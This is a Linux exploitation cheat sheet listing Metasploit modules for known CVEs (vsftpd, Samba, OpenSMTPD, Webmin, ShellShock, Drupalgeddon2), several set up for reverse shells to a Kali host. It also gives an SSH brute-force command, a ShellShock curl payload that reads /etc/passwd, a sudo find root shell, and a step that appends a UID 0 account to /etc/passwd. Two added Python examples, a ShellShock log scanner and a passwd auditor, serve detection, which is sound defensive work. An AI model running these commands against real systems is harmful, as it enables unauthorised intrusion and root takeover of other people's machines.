Linux Exploitation
21 - FTP (vsftpd 2.3.4 Backdoor)
# Check version
nmap -p 21 -sV <IP>
# MSF - vsftpd 2.3.4 backdoor (opens shell on port 6200)
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <IP>
run
445 - SMB (Samba)
# Check Samba version
nmap -p 445 -sV <IP>
use auxiliary/scanner/smb/smb_version
# MSF - Samba usermap_script (CVE-2007-2447, Samba < 3.0.20)
use exploit/multi/samba/usermap_script
set RHOSTS <IP>
set LHOST <kali_IP>
run
# MSF - EternalBlue on Linux
use exploit/linux/samba/is_known_pipename
set RHOSTS <IP>
run
22 - SSH
# Brute force
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://<IP>
use auxiliary/scanner/ssh/ssh_login
# Login with discovered credentials
ssh <user>@<IP>
ssh -i id_rsa <user>@<IP> # Using stolen private key
25 - SMTP (CVE-2020-7247)
OpenSMTPD < 6.6.2 is vulnerable to remote code execution via a malformed MAIL FROM header. No authentication required.
# MSF - OpenSMTPD RCE
use exploit/unix/smtp/opensmtpd_mail_from_rce
set RHOSTS <IP>
set LHOST <kali_IP>
run
Webmin (CVE-2019-15107)
Webmin 1.890 - 1.920 contains an intentionally backdoored password reset endpoint that allows unauthenticated RCE as root.
# MSF - Webmin backdoor
use exploit/linux/http/webmin_backdoor
set RHOSTS <IP>
set RPORT 10000
set SSL false
set LHOST <kali_IP>
# If target cannot reach Kali (isolated network), use a bind payload:
set payload cmd/unix/bind_perl
set LHOST <target_IP>
run
ShellShock (CVE-2014-6271)
Affects Bash < 4.3 where CGI scripts are exposed: the web server copies request headers into environment variables, and a header value starting with "() {" is parsed by Bash as a function definition followed by arbitrary commands.
# Manual test
curl -H 'User-Agent: () { :; }; echo; /bin/cat /etc/passwd' http://<IP>/cgi-bin/test.sh
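The same "() {" signature that the manual test above sends is what a defender looks for in web-server logs. The following is an added example, not part of the original cheat sheet: a small scanner over Apache "combined"-format access-log lines that flags the ShellShock function-definition shape in the request line, Referer or User-Agent, including the URL-encoded form. The sample log lines are constructed for the example and the hit output format is my own choice.

```python
import re

# ShellShock (CVE-2014-6271) payloads begin with a Bash function definition
# in an environment-variable value: "() {". Whitespace varies, and the same
# shape can arrive URL-encoded in the request line (%28%29 = "()", %7B = "{").
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{|%28%29\s*(%20)*%7[bB]', re.IGNORECASE)

# Apache "combined" log format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not from a real server). Line 1 carries the payload in
# the User-Agent, line 3 in the Referer, line 4 URL-encoded in the query string.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2024:13:55:36 +0000] "GET /cgi-bin/test.sh HTTP/1.1" 200 512 "-" "() { :; }; echo; /bin/cat /etc/passwd"
10.0.0.6 - - [10/Oct/2024:13:55:37 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.7 - - [10/Oct/2024:13:55:38 +0000] "GET /cgi-bin/status HTTP/1.1" 200 77 "() {:;}; /bin/id" "curl/7.68.0"
10.0.0.8 - - [10/Oct/2024:13:55:39 +0000] "GET /cgi-bin/test.sh?x=%28%29%20%7B%20%3A%3B%7D%3B HTTP/1.1" 404 0 "-" "-"
"""


def scan_access_log(text):
    """Return one (client_ip, field, value) tuple per log line that carries a
    ShellShock-shaped string. `field` names where it was found: the request
    line ("req"), the Referer ("ref") or the User-Agent ("ua")."""
    hits = []
    for line in text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format; a real deployment would log this
        for field in ("req", "ref", "ua"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append((m.group("ip"), field, m.group(field)))
                break  # one hit per line is enough for alerting
    return hits


if __name__ == "__main__":
    for ip, field, value in scan_access_log(SAMPLE_LOG):
        print(f"{ip}\t{field}\t{value}")
```

A 404 status (last sample line) does not make the attempt harmless: the signature is worth alerting on regardless of response code, since the request still reached the server and shows what the client is probing for.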
# MSF
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS <IP>
set TARGETURI /cgi-bin/test.sh
set LHOST <kali_IP>
run
Drupalgeddon2 (CVE-2018-7600)
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS <IP>
set LHOST <kali_IP>
run
# Lands as www-data - escalate via sudo find or SUID
Common Post-Access Escalation
# Check sudo rights
sudo -l
# GTFOBins - sudo find
sudo find . -exec /bin/bash \; -quit
# SUID search
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
# Writable /etc/passwd (if no shadow)
openssl passwd -1 -salt hacker hacker123
echo 'hacker:$1$hacker$...:0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker
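The /etc/passwd trick above leaves two tell-tale traces: a second UID 0 account and a password hash stored inline instead of the usual "x" pointing at /etc/shadow. The following audit is an added example, not part of the original cheat sheet: it parses passwd-format text and reports those two conditions plus empty password fields and malformed lines. The sample passwd content and the hash string in it are constructed for the example (the hash is a placeholder, not a real MD5-crypt value).

```python
# Constructed sample passwd content (not copied from any real system).
# The "eve" entry has an empty password field; the "hacker" entry is the
# shape produced by the openssl/echo commands above, with a placeholder hash.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
alice:x:1000:1000:Alice:/home/alice:/bin/bash
eve::1001:1001::/home/eve:/bin/sh
hacker:$1$hacker$CONSTRUCTED.NOT.A.REAL.HASH:0:0:root:/root:/bin/bash
"""

# Password-field values that legitimately appear in /etc/passwd on a shadowed
# system: "x" (hash lives in /etc/shadow), "*" and "!"-prefixed (locked).
SHADOWED_OR_LOCKED = ("x", "*")


def audit_passwd(text):
    """Return a list of (line_number, finding, account) tuples.

    Findings: 'extra-uid0'     - a UID 0 account that is not root
              'inline-hash'    - a password hash stored directly in passwd
              'empty-password' - an empty password field
              'malformed'      - a line that does not have the 7 passwd fields
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            findings.append((lineno, "malformed", line))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if int(uid) == 0 and name != "root":
            findings.append((lineno, "extra-uid0", name))
        if pw == "":
            findings.append((lineno, "empty-password", name))
        elif pw not in SHADOWED_OR_LOCKED and not pw.startswith("!"):
            findings.append((lineno, "inline-hash", name))
    return findings


def audit_passwd_file(path="/etc/passwd"):
    """Convenience wrapper for running the audit against a real file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for lineno, finding, account in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {finding}: {account}")
```

Run periodically (or from a file-integrity monitor triggered on /etc/passwd changes) this catches the append-to-passwd technique the moment it lands; the companion control is making sure /etc/passwd is not writable by anyone but root in the first place.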